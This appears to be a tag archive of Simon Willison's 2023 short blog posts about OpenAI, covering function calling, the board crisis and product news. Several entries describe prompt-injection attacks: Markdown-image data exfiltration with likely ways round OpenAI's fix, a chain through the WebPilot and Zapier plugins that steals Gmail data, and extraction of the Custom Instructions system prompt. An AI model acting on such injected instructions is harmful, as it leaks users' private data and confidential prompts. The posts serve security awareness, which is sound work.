Simon Willison’s Weblog

Subscribe

Blogmarks tagged openai in 2023

Filters: Type: blogmark × Year: 2023 × openai × Sorted by date


Pushing ChatGPT’s Structured Data Support To Its Limits. The GPT 3.5, 4 and 4 Turbo APIs all provide “function calling”—a misnamed feature that allows you to feed them a JSON schema and semi-guarantee that the output from the prompt will conform to that shape.

Max explores the potential of that feature in detail here, including some really clever applications of it to chain-of-thought style prompting.

He also mentions that it may have some application to preventing prompt injection attacks. I’ve been thinking about function calls as one of the most concerning potential targets of prompt injection, but Max is right in that there may be some limited applications of them that can help prevent certain subsets of attacks from taking place. # 21st December 2023, 5:20 pm

OpenAI Begins Tackling ChatGPT Data Leak Vulnerability (via) ChatGPT has long suffered from a frustrating data exfiltration vector that can be triggered by prompt injection attacks: it can be instructed to construct a Markdown image reference to an image hosted anywhere, which means a successful prompt injection can request the model encode data (e.g. as base64) and then render an image which passes that data to an external server as part of the query string.

Good news: they’ve finally put measures in place to mitigate this vulnerability!

The fix is a bit weird though: rather than block all attempts to load images from external domains, they have instead added an additional API call which the frontend uses to check if an image is “safe” to embed before rendering it on the page.

This feels like a half-baked solution to me. It isn’t available in the iOS app yet, so that app is still vulnerable to these exfiltration attacks. It also seems likely that a suitable creative attack could still exfiltrate data in a way that outwits the safety filters, using clever combinations of data hidden in subdomains or filenames for example. # 21st December 2023, 4:10 am

ChatGPT is one year old. Here’s how it changed the world. I’m quoted in this piece by Benj Edwards about ChatGPT’s one year birthday:

“Imagine if every human being could automate the tedious, repetitive information tasks in their lives, without needing to first get a computer science degree,” AI researcher Simon Willison told Ars in an interview about ChatGPT’s impact. “I’m seeing glimpses that LLMs might help make a huge step in that direction.” # 30th November 2023, 6:07 pm

Before Altman’s Ouster, OpenAI’s Board Was Divided and Feuding. This is the first piece of reporting I’ve seen on the OpenAI situation which has offered a glimmer of an explanation as to what happened.

It sounds like the board had been fighting about things for over a year—notably including who should replace departed members, which is how they’d shrunk down to just six people.

There’s also an interesting detail in here about the formation of Anthropic:

“Mr. Sutskever’s frustration with Mr. Altman echoed what had happened in 2021 when another senior A.I. scientist left OpenAI to form the company Anthropic. That scientist and other researchers went to the board to try to push Mr. Altman out. After they failed, they gave up and departed, according to three people familiar with the attempt to push Mr. Altman out.” # 22nd November 2023, 12:31 am

Inside the Chaos at OpenAI (via) Outstanding reporting on the current situation at OpenAI from Karen Hao and Charlie Warzel, informed by Karen’s research for a book she is currently writing. There are all sorts of fascinating details in here that I haven’t seen reported anywhere, and it strongly supports the theory that this entire situation (Sam Altman being fired by the board of the OpenAI non-profit) resulted from deep disagreements within OpenAI concerning speed to market and commercialization of their technology v.s. safety research and cautious progress towards AGI. # 20th November 2023, 4:35 am

Details emerge of surprise board coup that ousted CEO Sam Altman at OpenAI. The board of the non-profit in control of OpenAI fired CEO Sam Altman yesterday, which is sending seismic waves around the AI technology industry. This overview by Benj Edwards is the best condensed summary I’ve seen yet of everything that’s known so far. # 18th November 2023, 8:14 pm

tldraw/draw-a-ui (via) Absolutely spectacular GPT-4 Vision API demo. Sketch out a rough UI prototype using the open source tldraw drawing app, then select a set of components and click “Make Real” (after giving it an OpenAI API key). It generates a PNG snapshot of your selection and sends that to GPT-4 with instructions to turn it into a Tailwind HTML+JavaScript prototype, then adds the result as an iframe next to your mockup.

You can then make changes to your mockup, select it and the previous mockup and click “Make Real” again to ask for an updated version that takes your new changes into account.

This is such a great example of innovation at the UI layer, and everything is open source. Check app/lib/getHtmlFromOpenAI.ts for the system prompt that makes it work. # 16th November 2023, 4:42 pm

“Learn from your chats” ChatGPT feature preview (via) 7 days ago a Reddit user posted a screenshot of what’s presumably a trial feature of ChatGPT: a “Learn from your chats” toggle in the settings.

The UI says: “Your primary GPT will continually improve as you chat, picking up on details and preferences to tailor its responses to you.”

It provides the following examples: “I move to SF in two weeks”, “Always code in Python”, “Forget everything about my last project”—plus an option to reset it.

No official announcement yet. # 16th November 2023, 10:44 am

AGI is Being Achieved Incrementally (OpenAI DevDay w/ Simon Willison, Alex Volkov, Jim Fan, Raza Habib, Shreya Rajpal, Rahul Ligma, et al). I participated in an an hour long conversation today about the new things released at OpenAI DevDay, now available on the Latent Space podcast. # 8th November 2023, 2:50 am

Fine-tuning GPT3.5-turbo based on 140k slack messages. Ross Lazerowitz spent $83.20 creating a fine-tuned GPT-3.5 turbo model based on 140,000 of his Slack messages (10,399,747 tokens), massaged into a JSONL file suitable for use with the OpenAI fine-tuning API.

Then he told the new model “write a 500 word blog post on prompt engineering”, and it replied “Sure, I shall work on that in the morning”. # 8th November 2023, 2:44 am

A Hackers’ Guide to Language Models. Jeremy Howard’s new 1.5 hour YouTube introduction to language models looks like a really useful place to catch up if you’re an experienced Python programmer looking to start experimenting with LLMs. He covers what they are and how they work, then shows how to build against the OpenAI API, build a Code Interpreter clone using OpenAI functions, run models from Hugging Face on your own machine (with NVIDIA cards or on a Mac) and finishes with a demo of fine-tuning a Llama 2 model to perform text-to-SQL using an open dataset. # 25th September 2023, 12:24 am

LLM 0.11. I released LLM 0.11 with support for the new gpt-3.5-turbo-instruct completion model from OpenAI.

The most interesting feature of completion models is the option to request “log probabilities” from them, where each token returned is accompanied by up to 5 alternatives that were considered, along with their scores. # 19th September 2023, 3:28 pm

An Iowa school district is using ChatGPT to decide which books to ban. I’m quoted in this piece by Benj Edwards about an Iowa school district that responded to a law requiring books be removed from school libraries that include “descriptions or visual depictions of a sex act” by asking ChatGPT “Does [book] contain a description or depiction of a sex act?”.

I talk about how this is the kind of prompt that frequent LLM users will instantly spot as being unlikely to produce reliable results, partly because of the lack of transparency from OpenAI regarding the training data that goes into their models. If the models haven’t seen the full text of the books in question, how could they possibly provide a useful answer? # 16th August 2023, 10:33 pm

Prompt injected OpenAI’s new Custom Instructions to see how it is implemented. ChatGPT added a new “custom instructions” feature today, which you can use to customize the system prompt used to control how it responds to you. swyx prompt-inject extracted the way it works:

“The user provided the following information about themselves. This user profile is shown to you in all conversations they have—this means it is not relevant to 99% of requests. Before answering, quietly think about whether the user’s request is ’directly related, related, tangentially related,’ or ’not related’ to the user profile provided.”

I’m surprised to see OpenAI using “quietly think about...” in a prompt like this—I wouldn’t have expected that language to be necessary. # 20th July 2023, 7:03 pm

Study claims ChatGPT is losing capability, but some experts aren’t convinced. Benj Edwards talks about the ongoing debate as to whether or not GPT-4 is getting weaker over time. I remain skeptical of those claims—I think it’s more likely that people are seeing more of the flaws now that the novelty has worn off.

I’m quoted in this piece: “Honestly, the lack of release notes and transparency may be the biggest story here. How are we meant to build dependable software on top of a platform that changes in completely undocumented and mysterious ways every few months?” # 20th July 2023, 12:22 am

What AI can do with a toolbox... Getting started with Code Interpreter. Ethan Mollick has been doing some very creative explorations of ChatGPT Code Interpreter over the past few months, and has tied a lot of them together into this useful introductory tutorial. # 12th July 2023, 8:57 pm

LLM 0.4. I released a major update to my LLM CLI tool today—version 0.4, which adds conversation mode and prompt templates so you can store and re-use interesting prompts, plus a whole bunch of other large and small improvements.

I also released 0.4.1 with some minor fixes and the ability to install the tool using Hombrew: brew install simonw/llm/llm # 17th June 2023, 10:58 pm

Example of OpenAI function calling API to extract data from LAPD newsroom articles (via) Fascinating code example from Kyle McDonald. The OpenAI functions mechanism is intended to drive custom function calls, but I hadn’t quite appreciated how useful it can be ignoring the function calls entirely. Kyle instead uses it to define a schema for data he wants to extract from a news article, then uses the gpt-3.5-turbo-0613 to get back that exact set of extracted data as JSON. # 14th June 2023, 8:57 pm

Emergency Pod: OpenAI’s new Functions API, 75% Price Drop, 4x Context Length (via) I participated in a Twitter Spaces conversation last night about the new OpenAI functions mechanism. The recording has now been turned into a Latent Space podcast, and swyx has accompanied the recording with a detailed write-up of the different topics we covered. # 14th June 2023, 7:23 pm

OpenAI: Function calling and other API updates. Huge set of announcements from OpenAI today. A bunch of price reductions, but the things that most excite me are the new gpt-3.5-turbo-16k model which offers a 16,000 token context limit (4x the existing 3.5 turbo model) at a price of $0.003 per 1K input tokens and $0.004 per 1K output tokens—1/10th the price of GPT-4 8k.

The other big new feature: functions! You can now send JSON schema defining one or more functions to GPT 3.5 and GPT-4—those models will then return a blob of JSON describing a function they want you to call (if they determine that one should be called). Your code executes the function and passes the results back to the model to continue the execution flow.

This is effectively an implementation of the ReAct pattern, with models that have been fine-tuned to execute it.

They acknowledge the risk of prompt injection (though not by name) in the post: “We are working to mitigate these and other risks. Developers can protect their applications by only consuming information from trusted tools and by including user confirmation steps before performing actions with real-world impact, such as sending an email, posting online, or making a purchase.” # 13th June 2023, 5:34 pm

simpleaichat (via) Max Woolf released his own Python package for building against the GPT-3.5 and GPT-4 APIs (and potentially other LLMs in the future).

It’s a very clean piece of API design with some useful additional features: there’s an AsyncAIChat subclass that works with Python asyncio, and the library includes a mechanism for registering custom functions that can then be called by the LLM as tools.

One trick I haven’t seen before: it uses a combination of max_tokens: 1 and a ChatGPT logit_bias to ensure that answers to one of its default prompts are restricted to just numerals between 0 and 9. This is described in the PROMPTS.md file. # 8th June 2023, 9:06 pm

Examples of weird GPT-4 behavior for the string “ davidjl”. GPT-4, when told to repeat or otherwise process the string “ davidjl” (note the leading space character), treats it as “jndl” or “jspb” or “JDL” instead. It turns out “ davidjl” has its own single token in the tokenizer: token ID 23282, presumably dating back to the GPT-2 days.

Riley Goodside refers to these as “glitch tokens”.

This token might refer to Reddit user davidjl123 who ranks top of the league for the old /r/counting subreddit, with 163,477 posts there which presumably ended up in older training data. # 8th June 2023, 9:29 am

ChatGPT Plugins Don’t Have PMF. Sam Altman was recently quoted (in a since unpublished blog post) noting that ChatGPT plugins have not yet demonstrated product market fit.

This matches my own usage patterns: I use the “browse” and “code interpreter” modes on a daily basis, but I’ve not found any of the third party developer plugins to stick for me yet.

I like Matt Rickard’s observation here: “Chat is not the right UX for plugins. If you know what you want to do, it’s often easier to just do a few clicks on the website. If you don’t, just a chat interface makes it hard to steer the model toward your goal.” # 8th June 2023, 4:59 am

Logan Kilpatrick (OpenAI). “The API does not just change without us telling you. The models are static there.”

That’s the official line on the ongoing questions concerning whether OpenAI’s models have been degrading in quality over the last few weeks and months.

Worth noting that this mentions the API but doesn’t mention ChatGPT itself, which I suspect gets model updates a lot more frequently than the models served through the API. # 5th June 2023, 3:49 pm

Let ChatGPT visit a website and have your email stolen. Johann Rehberger provides a screenshot of the first working proof of concept I’ve seen of a prompt injection attack against ChatGPT Plugins that demonstrates exfiltration of private data. He uses the WebPilot plugin to retrieve a web page containing an injection attack, which triggers the Zapier plugin to retrieve latest emails from Gmail, then exfiltrate the data by sending it to a URL with another WebPilot call.

Johann hasn’t shared the prompt injection attack itself, but the output from ChatGPT gives a good indication as to what happened:

“Now, let’s proceed to the next steps as per the instructions. First, I will find the latest email and summarize it in 20 words. Then, I will encode the result and append it to a specific URL, and finally, access and load the resulting URL.” # 19th May 2023, 3:34 pm

Language models can explain neurons in language models (via) Fascinating interactive paper by OpenAI, describing how they used GPT-4 to analyze the concepts tracked by individual neurons in their much older GPT-2 model. “We generated cluster labels by embedding each neuron explanation using the OpenAI Embeddings API, then clustering them and asking GPT-4 to label each cluster.” # 9th May 2023, 5:35 pm

GPT-3 token encoder and decoder. I built an Observable notebook with an interface to encode, decode and search through GPT-3 tokens, building on top of a notebook by EJ Fox and Ian Johnson. # 27th April 2023, 11:48 pm

Latest Twitter search results for “as an AI language model” (via) Searching for “as an AI language model” on Twitter reveals hundreds of bot accounts which are clearly being driven by GPT models and have been asked to generate content which occasionally trips the ethical guidelines trained into the OpenAI models.

If Twitter still had an affordable search API someone could do some incredible disinformation research on top of this, looking at which accounts are implicated, what kinds of things they are tweeting about, who they follow and retweet and so-on. # 17th April 2023, 2:28 pm

The Great Flowering: Why OpenAI is the new AWS and the New Kingmakers still matter (via) James Governor discusses the potential impact of AI-assisted productivity on the wider software engineering industry, and calls me “a bellwether”! # 13th April 2023, 7:20 pm

Closed AI Models Make Bad Baselines (via) The NLP academic research community are facing a tough challenge: the state-of-the-art in large language models, GPT-4, is entirely closed which means papers that compare it to other models lack replicability and credibility. “We make the case that as far as research and scientific publications are concerned, the “closed” models (as defined below) cannot be meaningfully studied, and they should not become a “universal baseline”, the way BERT was for some time widely considered to be.”

Anna Rogers proposes a new rule for this kind of research: “That which is not open and reasonably reproducible cannot be considered a requisite baseline.” # 3rd April 2023, 7:57 pm